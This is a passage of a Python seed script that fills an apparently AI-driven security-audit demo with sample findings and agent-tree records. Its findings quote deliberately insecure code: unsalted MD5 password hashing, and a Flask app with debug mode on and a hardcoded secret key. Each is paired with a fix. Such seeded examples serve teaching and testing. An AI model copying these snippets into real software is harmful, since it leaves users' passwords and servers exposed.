            "status": FindingStatus.FALSE_POSITIVE,
            "is_verified": False,
            "verification_method": "代码审查 - 确认为示例配置模板",
            "verification_result": {"is_example": True, "reason": "File is .example template, not production config"},
            "suggestion": "确保 .example 文件不被误用，在 .gitignore 中排除实际配置文件",
            "ai_confidence": 0.85,
            "tags": ["false-positive", "configuration"],
        },
        {
            "vulnerability_type": VulnerabilityType.WEAK_CRYPTO,
            "severity": VulnerabilitySeverity.MEDIUM,
            "title": "使用不安全的 MD5 哈希算法存储密码",
            "description": "密码哈希使用了已被破解的 MD5 算法，没有使用盐值，容易受到彩虹表攻击和暴力破解。",
            "file_path": "app/utils/crypto.py",
            "line_start": 8,
            "line_end": 12,
            "function_name": "hash_password",
            "code_snippet": '''import hashlib
def hash_password(password):
# 危险：使用不安全的 MD5 且无盐值
return hashlib.md5(password.encode()).hexdigest()''',
            "status": FindingStatus.VERIFIED,
            "is_verified": True,
            "verification_method": "代码审查 - 确认使用弱哈希算法",
            "suggestion": "使用 bcrypt、Argon2 或 PBKDF2 等专门的密码哈希算法",
            "fix_code": '''import bcrypt
def hash_password(password):
# 修复：使用 bcrypt 进行安全的密码哈希
salt = bcrypt.gensalt(rounds=12)
return bcrypt.hashpw(password.encode(), salt).decode()
def verify_password(password, hashed):
return bcrypt.checkpw(password.encode(), hashed.encode())''',
            "references": [
                {"type": "CWE", "id": "CWE-327", "url": "https://cwe.mitre.org/data/definitions/327.html"},
                {"type": "CWE", "id": "CWE-916", "url": "https://cwe.mitre.org/data/definitions/916.html"},
            ],
            "ai_confidence": 0.97,
            "cvss_score": 6.5,
            "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "tags": ["cryptography", "password-storage", "md5"],
        },
        {
            "vulnerability_type": "security_misconfiguration",
            "severity": VulnerabilitySeverity.LOW,
            "title": "生产环境启用了调试模式",
            "description": "Flask 应用在生产环境中启用了调试模式，可能泄露敏感信息和允许远程代码执行。",
            "file_path": "app/__init__.py",
            "line_start": 25,
            "line_end": 28,
            "code_snippet": '''# 应用配置
app = Flask(__name__)
app.debug = True # 警告：生产环境应禁用
app.secret_key = 'development-key' # 警告：应使用安全密钥''',
            "status": FindingStatus.NEEDS_REVIEW,
            "is_verified": False,
            "suggestion": "在生产环境中禁用调试模式，使用环境变量配置",
            "fix_code": '''import os
app = Flask(__name__)
app.debug = os.environ.get('FLASK_DEBUG', 'False').lower() == 'true'
app.secret_key = os.environ.get('SECRET_KEY', os.urandom(24))''',
            "references": [
                {"type": "CWE", "id": "CWE-489", "url": "https://cwe.mitre.org/data/definitions/489.html"},
            ],
            "ai_confidence": 0.88,
            "cvss_score": 5.3,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "tags": ["configuration", "debug-mode", "information-disclosure"],
        },
    ]

    findings = []
    for i, fdata in enumerate(findings_data):
        verified_at = None
        if fdata.get("is_verified"):
            verified_at = task.started_at + timedelta(minutes=10 + i)
            # The per-index offset can run past the end of the task (and even
            # past "now" for later entries); a finding cannot be verified
            # after its task completed, so clamp to the completion time.
            if task.completed_at is not None and verified_at > task.completed_at:
                verified_at = task.completed_at
        finding = AgentFinding(
            id=str(uuid.uuid4()),
            task_id=task.id,
            vulnerability_type=fdata["vulnerability_type"],
            severity=fdata["severity"],
            title=fdata["title"],
            description=fdata.get("description"),
            file_path=fdata.get("file_path"),
            line_start=fdata.get("line_start"),
            line_end=fdata.get("line_end"),
            function_name=fdata.get("function_name"),
            code_snippet=fdata.get("code_snippet"),
            source=fdata.get("source"),
            sink=fdata.get("sink"),
            dataflow_path=fdata.get("dataflow_path"),
            status=fdata.get("status", FindingStatus.NEW),
            is_verified=fdata.get("is_verified", False),
            verification_method=fdata.get("verification_method"),
            verification_result=fdata.get("verification_result"),
            verified_at=verified_at,
            has_poc=fdata.get("has_poc", False),
            poc_code=fdata.get("poc_code"),
            poc_description=fdata.get("poc_description"),
            poc_steps=fdata.get("poc_steps"),
            suggestion=fdata.get("suggestion"),
            fix_code=fdata.get("fix_code"),
            fix_description=fdata.get("fix_description"),
            references=fdata.get("references"),
            ai_explanation=fdata.get("ai_explanation"),
            ai_confidence=fdata.get("ai_confidence"),
            xai_what=fdata.get("xai_what"),
            xai_why=fdata.get("xai_why"),
            xai_how=fdata.get("xai_how"),
            xai_impact=fdata.get("xai_impact"),
            cvss_score=fdata.get("cvss_score"),
            cvss_vector=fdata.get("cvss_vector"),
            tags=fdata.get("tags"),
            created_at=task.started_at + timedelta(minutes=5 + i),
        )
        # The fingerprint is derived from the populated finding itself.
        finding.fingerprint = finding.generate_fingerprint()
        findings.append(finding)
        db.add(finding)
    await db.flush()
    print(f"✓ 创建了 {len(findings)} 个漏洞发现")
    return findings
async def create_agent_tree_nodes(db: AsyncSession, task: AgentTask) -> list:
    """Create the demo agent tree for ``task``: one orchestrator and four children.

    Every node is stamped as created at ``task.started_at``, started ten
    seconds later, and finished at ``task.completed_at``.

    Args:
        db: Async session the nodes are added to and flushed on.
        task: Task the nodes belong to; supplies ``id``, ``started_at`` and
            ``completed_at``.

    Returns:
        The list of created nodes (flushed, not committed).
    """
    root_id = "orchestrator-001"
    # Each spec's keys are exactly the AgentTreeNode keyword names, so a spec
    # can be splatted straight into the constructor.
    specs = (
        dict(
            agent_id=root_id,
            agent_name="主控 Agent",
            agent_type="orchestrator",
            parent_agent_id=None,
            depth=0,
            task_description="协调整体审计流程，分发子任务",
            knowledge_modules=["security_patterns", "vulnerability_db"],
            status="completed",
            result_summary="成功协调完成安全审计，发现 8 个漏洞",
            findings_count=8,
            iterations=15,
            tokens_used=12500,
            tool_calls=25,
            duration_ms=780000,
        ),
        dict(
            agent_id="analyzer-sql-001",
            agent_name="SQL 注入分析 Agent",
            agent_type="analyzer",
            parent_agent_id=root_id,
            depth=1,
            task_description="检测和验证 SQL 注入漏洞",
            knowledge_modules=["sql_injection_patterns", "database_security"],
            status="completed",
            result_summary="发现 1 个严重 SQL 注入漏洞并验证成功",
            findings_count=1,
            iterations=5,
            tokens_used=8200,
            tool_calls=18,
            duration_ms=120000,
        ),
        dict(
            agent_id="analyzer-xss-001",
            agent_name="XSS 分析 Agent",
            agent_type="analyzer",
            parent_agent_id=root_id,
            depth=1,
            task_description="检测和验证跨站脚本漏洞",
            knowledge_modules=["xss_patterns", "frontend_security"],
            status="completed",
            result_summary="发现 1 个高危存储型 XSS 漏洞",
            findings_count=1,
            iterations=4,
            tokens_used=6800,
            tool_calls=12,
            duration_ms=95000,
        ),
        dict(
            agent_id="analyzer-cmd-001",
            agent_name="命令注入分析 Agent",
            agent_type="analyzer",
            parent_agent_id=root_id,
            depth=1,
            task_description="检测操作系统命令注入漏洞",
            knowledge_modules=["command_injection_patterns", "shell_security"],
            status="completed",
            result_summary="发现 1 个严重命令注入漏洞",
            findings_count=1,
            iterations=4,
            tokens_used=7100,
            tool_calls=15,
            duration_ms=110000,
        ),
        dict(
            agent_id="verifier-001",
            agent_name="沙箱验证 Agent",
            agent_type="verifier",
            parent_agent_id=root_id,
            depth=1,
            task_description="在隔离沙箱中验证漏洞可利用性",
            knowledge_modules=["exploitation_techniques", "poc_generation"],
            status="completed",
            result_summary="验证 6 个漏洞，排除 1 个误报",
            findings_count=6,
            iterations=8,
            tokens_used=11080,
            tool_calls=17,
            duration_ms=180000,
        ),
    )

    nodes = []
    for spec in specs:
        node = AgentTreeNode(
            id=str(uuid.uuid4()),
            task_id=task.id,
            **spec,
            created_at=task.started_at,
            started_at=task.started_at + timedelta(seconds=10),
            finished_at=task.completed_at,
        )
        nodes.append(node)
        db.add(node)
    await db.flush()
    print(f"✓ 创建了 {len(nodes)} 个 Agent 树节点")
    return nodes
async def main():
    """Seed the database with the complete Agent demo data set.

    Looks up the demo user (``demo@example.com``), then creates or reuses the
    demo project and creates the demo task with its events, findings and
    agent tree nodes inside a single transaction.

    If the demo user does not exist, a hint is printed and nothing is
    written. On any exception the transaction is rolled back, the traceback
    is printed, and the exception is re-raised. The engine is disposed in
    every case so pooled connections are closed before the event loop ends.
    """
    print("=" * 60)
    print("创建 Agent 审计任务演示数据")
    print("=" * 60)
    # Open the database connection.
    engine = create_async_engine(settings.DATABASE_URL, echo=False, future=True)
    async_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
    try:
        async with async_session() as db:
            try:
                # Fetch the demo user.
                result = await db.execute(select(User).where(User.email == "demo@example.com"))
                demo_user = result.scalars().first()
                if not demo_user:
                    print("❌ 未找到演示用户 (demo@example.com)")
                    print("请先运行应用初始化数据库")
                    return
                print(f"使用演示用户: {demo_user.email}")
                # Create or fetch the demo project.
                project = await get_or_create_demo_project(db, demo_user.id)
                # Create the Agent task.
                task = await create_agent_demo_task(db, project, demo_user.id)
                # Create the event stream.
                await create_agent_events(db, task)
                # Create the vulnerability findings.
                await create_agent_findings(db, task)
                # Create the Agent tree nodes.
                await create_agent_tree_nodes(db, task)
                # Commit everything as one transaction.
                await db.commit()
                print("=" * 60)
                print("✅ Agent 演示数据创建完成！")
                print(f" 任务 ID: {task.id}")
                print(f" 项目: {project.name}")
                print(f" 发现漏洞: {task.findings_count}")
                print(f" 严重程度分布:")
                print(f" - Critical: {task.critical_count}")
                print(f" - High: {task.high_count}")
                print(f" - Medium: {task.medium_count}")
                print(f" - Low: {task.low_count}")
                print("=" * 60)
            except Exception as e:
                await db.rollback()
                print(f"❌ 创建失败: {e}")
                import traceback
                traceback.print_exc()
                raise
    finally:
        # The engine is created in function scope; dispose it explicitly so
        # its pooled connections are closed on success, early return and
        # failure alike.
        await engine.dispose()
# Run the async entry point only when this module is executed as a script.
if __name__ == "__main__":
    asyncio.run(main())